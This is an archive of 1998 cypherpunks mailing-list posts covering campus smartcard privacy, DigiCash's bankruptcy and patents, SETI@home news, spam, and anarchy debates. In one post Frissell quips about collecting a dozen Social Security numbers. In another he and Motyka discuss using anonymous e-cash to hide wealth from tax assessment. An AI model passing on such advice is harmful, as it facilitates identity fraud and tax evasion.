     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 5 Nov 1998 06:15:35 +0800
To: cypherpunks@cyberpass.net
Subject: IP: ISPI Clips 6.05: U. of T. Students Question Smartcard Technology & Privacy
Message-ID: <199811042123.NAA18974@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ama-gi ISPI" <offshore@email.msn.com>
Subject: IP: ISPI Clips 6.05: U. of T. Students Question Smartcard Technology & Privacy
Date: Tue, 3 Nov 1998 00:19:58 -0800
To: <Undisclosed.Recipients@majordomo.pobox.com>

ISPI Clips 6.05: U. of T. Students Question Smartcard Technology & Privacy
News & Info from the Institute for the Study of Privacy Issues (ISPI)
Tuesday November 3, 1998
ISPI4Privacy@ama-gi.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This From: WIRED News, November 2, 1998
http://www.wired.com

Students Wonder: How Smart?
http://www.wired.com/news/news/politics/story/15978.html

by
Marlene Blanshay, blanshay@total.net

TORONTO -- A coalition of University of Toronto students is leading an open
forum on smartcard technology Monday to discuss concerns that a new campus
card program may be compromising their privacy.

The T-card pilot project began last year when the university distributed
45,000 smartcards to students, staff, and faculty. Like many students
across the US, where such programs are common, the 39,000 Toronto
volunteers were sold on the convenience of having all their ID combined on
a single piece of plastic.

"[Students] don't have to carry around so many cards," said University of
Toronto registrar Karel Swift, the chairwoman of the school's T-card
implementation committee.

Not everybody feels that way. The university says it has been open about
the new program, but some students feel that the school has not been up
front with them about what is being done with information on purchases made
with the card.

"We just want some answers," said James Hooch of the Identity Technology
Working Group, the coalition of students and faculty that will host
Monday's forum.

"We feel we are being used as a captive market."

Andrew Clement, a professor of information studies at the University of
Toronto, said the university has an obligation to be more open about the
project.

"We don't think they are up to some nefarious scheme," said Clement,
moderator of Monday's forum. "But they are implementing the new technology,
which is going to be used in a wider setting, and should be setting a good
example."

Nevertheless, Swift said that students have not been left out of the
process.

"We consulted with student reps when the project was under consideration,"
Swift said. She added that the university has privacy policy and that their
records are protected by a rigorous access to information policy.

Some still worry that the university, in the interest of efficiency, is
introducing a new technology without looking at the potential uses or
misuses.

"There is a lot of concern among the students about collection of
information for purposes they are not aware of," says Jack Dimond, the
university's commissioner for freedom of information and privacy. "My
concern is that as smartcards are used more, there is a procedure of review
of information it collects. When you begin using the new applications, you
have to look at them closely."

One freedom and privacy advocate encourages students to boycott the cards.

"[Students] should just say, 'I refuse to use this card for any cash
purchases until you tell me where this info is going and what you're doing
with it,'" said David Jones, president of Electronic Frontier Canada.

Copyright (c) 1994-98 Wired Digital Inc.


--------------------------------NOTICE:------------------------------
ISPI Clips are news & opinion articles on privacy issues from
all points of view; they are clipped from local, national and international
newspapers, journals and magazines, etc. Inclusion as an ISPI Clip
does not necessarily reflect an endorsement of the content or opinion
by ISPI. In compliance with Title 17 U.S.C. section 107, this material is
distributed free without profit or payment for non-profit research
and educational purposes only.
---------------------------------------------------------------------------

ISPI Clips is a FREE e-mail service from the "Institute for the Study
of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.







****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "SETI@home" <setiathome@ssl.Berkeley.EDU>
Date: Thu, 5 Nov 1998 06:27:03 +0800
To: cypherpunks@cyberpass.net
Subject: SETI@home Project Update
Message-ID: <199811042141.NAA10920@siren.ssl.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



Dear SETI@home volunteer:

Thank you for signing up for SETI@home.  We're on schedule to
distribute the SETI@home screensaver program in April 1999, and
we'll send you another email when that happens.

On October 30 we began recording data at the world's largest
radio telescope, located in Arecibo, Puerto Rico.  Preliminary
versions of the screensaver program and the data distribution
system have been completed.  On November 20 we will begin
testing the system with a group of 100 users analyzing real data
(sorry - no more volunteers needed).  Over the next few months
we will complete the testing, making sure the system will handle
large numbers of users.

We are pleased to thank SETI@home's sponsors and technology
partners: the Planetary Society (a 100,000 member organization
founded by Carl Sagan), Paramount Studios (in conjunction with
their new movie, Star Trek IX:  Insurrection), Sun Microsystems,
EDT, Fuji Film Computer Products, Informix, and individual donors
like you. The screen saver will be free for everyone, but if
you can consider making a tax-deductible donation to SETI@home,
please visit http://setiathome.ssl.berkeley.edu/donor.html.
We also invite you to become a member of The Planetary Society.
You can visit their site at http://www.planetary.org.

For further SETI@home information and news, please see
http://setiathome.ssl.berkeley.edu.

Thank you again for offering to participate in SETI@home.  Our
work is enhanced and inspired by the enthusiasm of thoughtful,
adventurous, and generous people like you.

If you wish to remove your name from the SETI@home email list,
please send an empty email message to this address with subject
header "remove".

Best wishes,

The SETI@home project




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "SETI@home" <setiathome@ssl.Berkeley.EDU>
Date: Thu, 5 Nov 1998 07:28:05 +0800
To: cypherpunks@toad.com
Subject: SETI@home Project Update
Message-ID: <199811042141.NAA10924@siren.ssl.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



Dear SETI@home volunteer:

Thank you for signing up for SETI@home.  We're on schedule to
distribute the SETI@home screensaver program in April 1999, and
we'll send you another email when that happens.

On October 30 we began recording data at the world's largest
radio telescope, located in Arecibo, Puerto Rico.  Preliminary
versions of the screensaver program and the data distribution
system have been completed.  On November 20 we will begin
testing the system with a group of 100 users analyzing real data
(sorry - no more volunteers needed).  Over the next few months
we will complete the testing, making sure the system will handle
large numbers of users.

We are pleased to thank SETI@home's sponsors and technology
partners: the Planetary Society (a 100,000 member organization
founded by Carl Sagan), Paramount Studios (in conjunction with
their new movie, Star Trek IX:  Insurrection), Sun Microsystems,
EDT, Fuji Film Computer Products, Informix, and individual donors
like you. The screen saver will be free for everyone, but if
you can consider making a tax-deductible donation to SETI@home,
please visit http://setiathome.ssl.berkeley.edu/donor.html.
We also invite you to become a member of The Planetary Society.
You can visit their site at http://www.planetary.org.

For further SETI@home information and news, please see
http://setiathome.ssl.berkeley.edu.

Thank you again for offering to participate in SETI@home.  Our
work is enhanced and inspired by the enthusiasm of thoughtful,
adventurous, and generous people like you.

If you wish to remove your name from the SETI@home email list,
please send an empty email message to this address with subject
header "remove".

Best wishes,

The SETI@home project




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 5 Nov 1998 03:15:17 +0800
To: cypherpunks@Algebra.COM
Subject: Quick, Dear -- Beat Me
In-Reply-To: <v03130318b2627b816c00@[209.66.100.110]>
Message-ID: <199811041840.NAA00424@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At last an Administration Domestic Violence provision I can support.  Al
Gore has just proposed that victims of domestic violence should be able to
easily get new SS#.  Collect a dozen.

New options for privacy vis-a-vis private individuals and even the government.

Protection of "victims" won't work if the new number is reported to the Big
Three credit reporting bureaus.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bernardo B. Terrado" <bbt@mudspring.uplb.edu.ph>
Date: Wed, 4 Nov 1998 14:35:47 +0800
To: coderpunks@toad.com
Subject: knapsack...
In-Reply-To: <Pine.GSO.3.96.981103113606.21393A-100000@mudspring.uplb.edu.ph>
Message-ID: <Pine.GSO.3.96.981104135241.9658B-100000@mudspring.uplb.edu.ph>
MIME-Version: 1.0
Content-Type: text/plain




 Could someone tell(give) me where to get a source code
 for the knapsack algo (w/ backtracking).
 
 I am going to "parallelize" it.
 
 (suggestions/comments ?)
 
 
 Thank you.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 5 Nov 1998 03:34:14 +0800
To: Michael Motyka <rah@shipwright.com>
Subject: Re: ?Lions?
In-Reply-To: <v04020a15b264af18b1aa@[139.167.130.246]>
Message-ID: <199811041855.NAA03080@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:17 AM 11/4/98 -0800, Michael Motyka wrote:

>It is the financial foundation for a cyber world where regulators will
>probably have a great deal of trouble operating. They may have no choice
>but to settle for taking their cut at the borders.

Note that the "informal" sector as a percentage of the "formal center is
100% for the Russian economy, 30% for the Italian and Belgium economies and
at least 10% of the US economy with conventional payment systems.  

>I still see many of the same old problems when attempting to trade hard
>goods, at least in large quantities. The problem of having to explain
>how you came by a 6000 sqare foot home on 100 acres of mountainside in
>Lake Pacid is not solved. It's not a total solution but it looks good.

Rent don't buy.

>It could be a great way to save for retirement - nobody can tell how
>much E$ you have accumulated, where it came from or where you keep it.
>Just draw it out as you need it, pay your taxes at the gate and use the
>5th when necessary.

True.  Even works for general purposes.  Very hard to "net worth" people.
Expensive process.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 5 Nov 1998 07:17:59 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone Alternative
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B232@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain



[dbts and e$ Cc: dropped]

Petro wrote:
> However, Privacy + Freedom == Anarchy, or close enough to be
> indistinguishable.

However much I may or may not agree with you, that is an entirely subjective
judgement. In political context, anarchy = without rule of government --
nothing more, nothing less. That necessarily means you will have freedom
from government, but does not imply you will have freedom from others. Ditto
for privacy. In fact there is good claim that privacy will not exist in
anarchy except by those that decide to use the tools and methods to achieve
it -- cat and mouse game same as today, except the corporate cats are bound
by economics (the value of data to them versus the cost to obtain it)
whereas government cats are not.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Total Telecom Web <webmaster@totaltele.com>
Date: Thu, 5 Nov 1998 00:20:45 +0800
To: "cypherpunks@toad.com>
Subject: Registration
Message-ID: <199811041539.PAA03615@mixy.aspectgroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Thankyou for registering with Total Telecom

Your username is: cypherpunks@toad.com

Your password is: cypherpunks

If you haven't already done so, you can set a 'cookie' to make entry
easier - go to - http:www.totaltele.com/register/help.asp

If at anytime you wish the change your user profile - go to -
http:www.totaltele.com/register/edit.asp

We recomend you keep a copy of these details in case you forget your
password or your 'cookie' is lost.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 5 Nov 1998 05:37:28 +0800
To: mac-crypto@vmeng.com
Subject: DigiCash Inc. to File Reorganization, Seeks Partners to Drive eCash Forward
Message-ID: <v04020a12b2666fb92bd4@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Reply-To: <sjl@sjl.net>
From: "Scott Loftesness" <sjl@sjl.net>
To: <dbs@philodox.com>
Subject: DigiCash Inc. to File Reorganization, Seeks Partners to Drive
 eCash Forward
Date: Wed, 4 Nov 1998 12:32:56 -0800
Mime-Version: 1.0
X-Priority: 3 (Normal)
X-Msmail-Priority: Normal
Importance: Normal
X-Mimeole: Produced By Microsoft MimeOLE V4.72.3110.3
Sender: <dbs@philodox.com>
Precedence: Bulk
List-Subscribe: <mailto:requests@philodox.com?subject=subscribe%20dbs>
X-Web-Archive: http://www.philodox.com/dbs-archive/

FYI...

DigiCash Inc. to File Reorganization, Seeks Partners to Drive eCash Forward

PALO ALTO, CALIF.--November 4, 1998

DigiCash Inc. has announced that it is entering into a Chapter 11
reorganization to allow it to pursue strategic alternatives for its
electronic cash ("eCash" (tm)) products and the associated intellectual assets
pioneered by DigiCash.

According to Scott Loftesness, interim CEO of DigiCash, "The company is
exploring a range of potential alternatives including working with major
strategic players to finance the market development of eCash or the sale
and/or licensing of the Company's intellectual property portfolio."
Loftesness added, "eCash(tm), as it has been developed by DigiCash, is an
important and inevitable payment solution in the world of global electronic
commerce."

The DigiCash payment solution is currently in use by leading banks in Europe
and Australia.  These banks have deployed the DigiCash eCash solution and
continue to add to their respective consumer and merchant eCash acceptance
networks.

DigiCash's eCash(tm) payment solution offers a secure, low cost and private
payment option to consumers for payments of any amount.  The intellectual
property owned by DigiCash consists of a series of patents, protocols, and
software systems that were specifically designed to be privacy protecting
for consumers and which also enable other applications like online
electronic voting.  The ability to pay privately, without revealing personal
information, and avoiding the capture of personal transaction information
for marketing or other subsequent uses is a growing concern among consumers
globally.

Contact: Scott Loftesness: (650) 798-8183 or via email: sjl@sjl.net

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 5 Nov 1998 07:39:31 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811042301.RAA09484@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
> 	 Alternative
> Date: Wed, 4 Nov 1998 14:29:47 -0800 

> Petro wrote:
> > However, Privacy + Freedom == Anarchy, or close enough to be
> > indistinguishable.

This is silly.

> for privacy. In fact there is good claim that privacy will not exist in
> anarchy except by those that decide to use the tools and methods to achieve
> it -- cat and mouse game same as today, except the corporate cats are bound
> by economics (the value of data to them versus the cost to obtain it)
> whereas government cats are not.

They're bound by economics and nothing else, not even the government cats.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-news1@netscape.com
Date: Thu, 5 Nov 1998 06:35:55 +0800
To: <cypherpunks@Algebra.COM>
Subject: FREE CD With Your Free Netcenter Membership
Message-ID: <199811042203.RAA28336@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain





****************************************************
CLICK HERE TO JOIN NETCENTER NOW AND GET A FREE CD! 
http://home.netscape.com/welcome/musicblvd/3.html 
****************************************************
  

Dear Internet User: 

You are receiving this offer because you are a valued Netscape
customer.  And now we would like for you to discover for
yourself why millions of people have signed up for Netscape
Netcenter, and why industry analysts say Netcenter "goes well beyond the
services available from any other portal site."* 

Becoming a Netscape Netcenter member is fast, easy and FREE. 

PLUS,  IF YOU SIGN UP NOW YOU'LL GET A FREE CD FROM MUSIC BOULEVARD! 

Netscape Netcenter gives you the best of what you need on the Internet, 
customized especially for you.  Just look at what you'll get with your 
free membership: 

FREE PERMANENT EMAIL 
When you open a Webmail account you can access email from any Internet- 
connected computer in the world. 

FREE CUSTOMIZED HOME PAGE 
With "My Netscape" you can create your own customized homepage with all 
the information you want exactly where you want it. 

FREE AOL INSTANT MESSAGING 
You can communicate INSTANTLY with friends, co-workers and family any 
time you want. You don't even need to be an AOL subscriber! 

FREE DOWNLOADS OF NETSCAPE SOFTWARE 
A Netscape Exclusive! Download the latest version of Communicator!

FREE NEWS AND SUBSCRIPTIONS 
All the news you need, any time you need it, from Inbox Direct to your 
desktop.  You get instant access to more than 135 popular online 
publications. 

FREE AUTOMATIC SOFTWARE UPDATES 
Smart Update keeps your Netscape software current by automatically 
letting you know every time an update is available. 

FREE NETCENTER MEMBER DIRECTORY 
Find other members any time, from friends and colleagues to other 
professionals in your industry. 

FREE 17 INDIVIDUAL CHANNELS OF VALUABLE INFORMATION 
>From computing to travel, lifestyles to sports, and health to autos -- 
you can find almost everything on Netcenter. 

FREE CONTINUOUSLY UPDATED ABC NEWS 
The latest news updated throughout your busy day. Join NOW -- It's Free! 

There's so much more you'll get with your FREE Netcenter membership -- 
from Net Search to Classifieds to our comprehensive Web Directory to 
What's New, What's Cool and complete Yellow and  White Pages.  
Plus there are lively discussion groups and THE BEST WEB CONTENT 
YOU CAN FIND ANYWHERE. 

You can even get Netcenter in 17 international versions!  And you'll be 
glad to know that navigating the net as a Netscape Netcenter member 
is both easy and fun. 

Keep in mind that many of our most popular services, like Webmail and 
Instant Messages, ARE RESERVED FOR REGISTERED MEMBERS. 
So why not join now and start enjoying all these FREE SERVICES 
and get a FREE CD from Music Boulevard! 

Sincerely, 

Tom Leonard
Netcenter Marketing 
  

JOIN INSTANTLY! Click here and you're IN! 
http://home.netscape.com/welcome/musicblvd/3.html 

We respect your online time and Internet privacy. If you would prefer 
not to receive further marketing promotions from Netcenter, 
reply to this message with the word unsubscribe in the subject line. 

P.S. Join Netcenter NOW and get a free CD from Music Boulevard!  Don't 
wait...there's no better time to join.  We're eager to welcome you as a 
new Netscape Netcenter member. 

*Source:  Los Angeles Times, 7/16/98 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 5 Nov 1998 07:59:21 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811042335.RAA09772@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 4 Nov 1998 18:29:20 -0500
> From: Robert Hettinga <rah@shipwright.com>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>  (fwd)

> At 6:01 PM -0500 on 11/4/98, Jim Choate wrote, from the bowels of my killfile:
> 
> 
> > They're bound by economics and nothing else, not even the government cats.
> 
> Amen.

Which is why it's a *BAD* idea.

> A government is just another economic actor. A very large economic actor
> with lots of guns and a monopoly on force, but an economic actor
> nonetheless.

You need to look around, the government has NO monopoly on force.

> Reality is not optional.

Absolutely, that's why any free-market/anarchy is doomed to fail.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 5 Nov 1998 07:46:56 +0800
To: Digital Bearer Settlement List <cypherpunks@cyberpass.net
Subject: Re: DigiCash Inc. to File Reorganization, Seeks Partners to DriveeCash Forward
In-Reply-To: <v04020a12b2666fb92bd4@[139.167.130.246]>
Message-ID: <v04020a13b26671c6a73b@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Okay.

Contrary to my own previous -- and painfully recent -- opinions on the matter,
Digicash, Inc., is, more or less, in play again, or it will be if there is
enough money chasing it. Whatever "enough" means.

Putting on my Gordon Gekko hat, here, I'm interested in finding out a few
things. Yes, I have seen the greater fool theory of the blind signature patent
operate more than a few times, but I am, nonetheless, driven to think about
this, and I might as well be public in my musing, at least for the time being.


For expenses of any new company, it should be pretty clear by now what I would
do with the DigiCash technology portfolio. I would put a real good
intellectual property lawyer on the payroll, keep the cryptographers who would
still consent to stick around, keep or improve whatever software test people
they have left, and do nothing but sell licenses and implementation
certifications, using the the underwiting model at
<http://www.philodox.com/modelpaper.html> as a roadmap.

For this imaginary company's revenue, aside from direct fees for validating a
developer's, and possibly an underwriter's, implementation of the protocol,
the trustee would be the only point of patent royalty collection and payment
from the underwriters and developers to the new patent holder.

As far as the current installed base is concerned, I would probably spin off a
company to support those customers, and give it a non-exclusive license as if
it were any other developer.

This assumes, of course, that DigiCash BV/Inc. didn't issue
exclusive-by-country licenses. While it appears on the surface that they have
done exactly this, I have been met with what seems like incredulity from
various DigiCash folks when I talk about it, so, for the time being, I'll take
them at their word when they tell me it isn't so. Actually, when I think about
it, it may be immaterial, as there are lots of countries on the internet to
park underwriters and trustees in, and they can denominate their bearer cash
instruments in any currency they want.

One way or another, the software side of DigiCash would be gone. We figure out
what the net present value is of the current licenses, and hope that a company
can be formed around that cashflow and spun off into a separate software
development company. If we're lucky, we make money on the spinoff and keep the
patent. If we're not lucky, DigiCash will probably have to get rid of it's
current obligations before *anyone* clueful would step in to pick up the
patents, and just the patents, alone.


Obviously, what has been spent so far building DigiCash, BV or Inc., is
immaterial to any discussion of the future. Just like what happened to Chaum,
et. al., when Negroponte and companies um, executed, the purchase of last
version of DigiCash, we have to completely forget the all the money which
has been spent on Digicash BV, now Digicash Inc., so far, and ignore the
howls of the current investors, as painful as that may be to listen to. :-).
They knew the job was dangerous when they took it, anyway...


Okay, that's a nice story. How about some actual data? I expect the best way
to get a handle of royalties is to start soliciting actual projected royalty
estimates from potential developers and underwriters, but, frankly, I think
that most developers and underwriters, like the rest of us, have no real idea
how much money they're going to make. Nonetheless, if anyone's interested in
telling me, offline, what they think they would would be fair royalty
payments, either as an underwriter or as a developer, I'd like to hear their
estimates. My PGP key is attached.

My own rule of thumb, for cash anyway, is that an underwriter can probably
charge no more than a bank charges to one of their non-customer ATM
transactions. That's probably no more than $3.00 a withdrawl. They also get to
keep the interest on the reserve account, if any, of course. Frankly, if the
royalties are low enough, that may be more than enough revenue to bootstrap a
business with, and   I would personally lobby for as low a royalty structure
as possible. That, of course, is driven entirely by the cost/revenue picture,
but it might be that a majority of the short-term operations can be
bootstrapped out of validation fees.


That leaves all the other potential markets for blind-signature macroscale
digital bearer settlement, everything from long-duration bandwidth purchases
for IP or voice dialtone on up to actual securities transactions themselves.
Most of these potential applications will occur after the patents expire,
but whoever owns these patents should allow not only licenses to all comers,
but, more to the point, should allow all *licensees* to worry about the
legal ramafications of the patents' use.

If a particular licensee can find a legal jurisdiction to offer utterly
anonymous digital bearer instruments backed by totally anonymous reserves,
then, as long as the licensee pays up, god bless 'em. The patents should be
licensed within the law, certainly, but, other than that, their use should be
considered value neutral, like all technology. As in all bearer markets
before them, the digital bearer trustee will be the point of maximum legal
compliance, and, as such, will be the functional "policeman" of the system.  I
leave the interesting solution of bearer-backed trustees for some other day,
probably after the patents have long expired.


Okay. There's lots more to talk about, of course, but I'm kind of tapped out
on this for the time being.

If you're an intellectual property lawyer, and you fancy yourself running the
DigiCash patent portfolio, contact me directly. I'm not sure exactly what I
can do, if anything, but I'd be very interested to hear your thoughts on this,
as the potential core person of this as yet imaginary enterprize, up to, and
including what it would cost for you to sign on for this much fun as at least
in-house counsel, if not the actual CEO. :-).

In addition, if someone has a reasonable non-proprietary(!) estimate of the
projected revenues on all those outstanding ecash contracts, that would be
nice to know as well. The terms of those contracts, are, of course, probably
unknowable at the moment, at least until someone has enough known scratch to
belly up to the table, sign an NDA and take a peek. Of course, then they
couldn't tell us anything anyway...

Isn't this fun?



Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNkDcTMUCGwxmWcHhAQFEgwf8DBmtjkxkrvwRBNdaMHwLGkjPHPFvhrNq
+IwQrajratocfyKDmeUIiC4EmPIFxstFg59plpzgnM8TTXqSebqsYZaycVZquo03
SDI2cXV9H4O+iUdW9glpT4R0aZbGMXTu3ji9wbvvYjSqVro4w6cq3f9Tk6QGGCdW
AQQolnnTkSjqXeafWrD0WxDXbQCw83lKcrTmFHAkP/YzDD8Z5obVD4+THd3Zlcys
jyAlvAcZFwcxtifumBh8vNrSLc0vdkdD4+Mw5TDRqRMHynF+DLE6Ek2kOL+3blJ2
R6vfaYzVJTRjJFtVdYrbctWAkbWCL/Obf31oZzsz1cWtNn6TgVmG/g==
=M1uk
-----END PGP SIGNATURE-----


Here are my PGP keys, for them as want 'em:


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Personal Privacy 5.5.5

mQGiBDS2zbQRBADkXbVlxD0ABf66RPDa//8wtyO3evDk3dMLl9gV9W6W8BQds9gM
2KyV/wnHq62tW7PSjw/CJY83da45KeX04LUNGD2TOOCRdYNBhVhmSWlXbomKMJNi
+TCisQKnS9U/ybFEKJErNpoapsh6m02RK4WADZk0pwO1Rh4K+P6sVRJktwCg/8iQ
uMwVCdEaKgo7RRTvRcA4NusEAIDKsblYtLCFagDELioT8YfV5FgROpmlhZWwCG7e
VrKQwQCFawJqrORMVOkjmppYAvPMoiAXT1vdlHXecB8VSzQjH92e7mrN/PSWIuTg
AjE+jZQxH9Fq1iL0EUg5Y+aAKzVFX1hl7RSwakWNey9ZmmFFlFDCmbKQkXGYPeTo
9X3PBAChBfP/ZdP+g5XMr+pWCRAduoOOWUwkFJ+Dy+dK4gnkJI7UxIrTzH1t3Crp
XbN43SrS524iKSnvPgN11fXDGvaRkNjxRtGR5pv/DJZWxc32J7aUdCJ3T4Oi6Dz0
7bsmK8U97psLO1n31w/6IRtwJMUQNZmOYXChjgg9/R9kBz3rmrQkUm9iZXJ0IEhl
dHRpbmdhIDxyYWhAc2hpcHdyaWdodC5jb20+iQBLBBARAgALBQI0ts20BAsDAgEA
CgkQw/EfyN/eiFpi9gCghN+lHw+ah3ttAiK/0jvZU0ZjWc8AoKfAe547G4o9kK/z
hv4v8zE1+PXitCJSb2JlcnQgSGV0dGluZ2EgPHJhaEBwaGlsb2RveC5jb20+iQBL
BBARAgALBQI1CvaYBAsDAgEACgkQw/EfyN/eiFo48ACgvADvKZgIxCXGHhX11akG
VpDv7MQAn3zfuyDbJHJ7oXx2bOEMF9KmCCqCuQQNBDS2zdAQEAD5GKB+WgZhekOQ
ldwFbIeG7GHszUUfDtjgo3nGydx6C6zkP+NGlLYwSlPXfAIWSIC1FeUpmamfB3TT
/+OhxZYgTphluNgN7hBdq7YXHFHYUMoiV0MpvpXoVis4eFwL2/hMTdXjqkbM+84X
6CqdFGHjhKlP0YOEqHm274+nQ0YIxswdd1ckOErixPDojhNnl06SE2H22+slDhf9
9pj3yHx5sHIdOHX79sFzxIMRJitDYMPj6NYK/aEoJguuqa6zZQ+iAFMBoHzWq6MS
HvoPKs4fdIRPyvMX86RA6dfSd7ZCLQI2wSbLaF6dfJgJCo1+Le3kXXn11JJPmxiO
/CqnS3wy9kJXtwh/CBdyorrWqULzBej5UxE5T7bxbrlLOCDaAadWoxTpj0BV89AH
xstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N286Z4VeSWc39uK50T8X8
dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/RgBYK+X0iP1YTknbzSC0
neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2Ou1WMuF040zT9fBdXQ6Md
GGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZyAcpesqVDNmWn6vQClCbAkbTCD1m
pF1Bn5x8vYlLIhkmuquiXsNV6z3WFwACAhAAqNEjDUUjFuMsIh8DIQGuXpqUh3Gw
olkg2DNkk252z8f25n/kfpy8B083S3Md9YiOUHeWYxEsafRfeesnNEkYXxGERXXv
vTAJdmT0pdKMzNiUxO1yqzhE3dCrF3qfbCIV7YQ0IU9mtH5mfYKaRUNQ4YtIErn+
isiYVay8XA2kIGsRWCM+4TIXEsgHplZ+4DOBcpj9bqykiV+HlePi3oMlVTlWpoyZ
SqMV8nWs1LQD22NQ+vG7EpY0SNaIwfcDOr9Afub9YxQuWX2d9pKlDQtkEzr/ycMX
DKr5MEtSiYYqIzzvqfexBatC84+YFf49v/i3MDfdevc6f2P6wYnvD7IkwEg51tQT
WKcPWB+d1CdvmDYmZFfbypRkVM9+eznqKlxi5KdOt/h6qbe700IQJmuPKncUAN2b
H3khcFflcHMIBZzFviJCC2B3Odko18m1pArGLojuVH00Fwm9wJwNMradRNDaqrc9
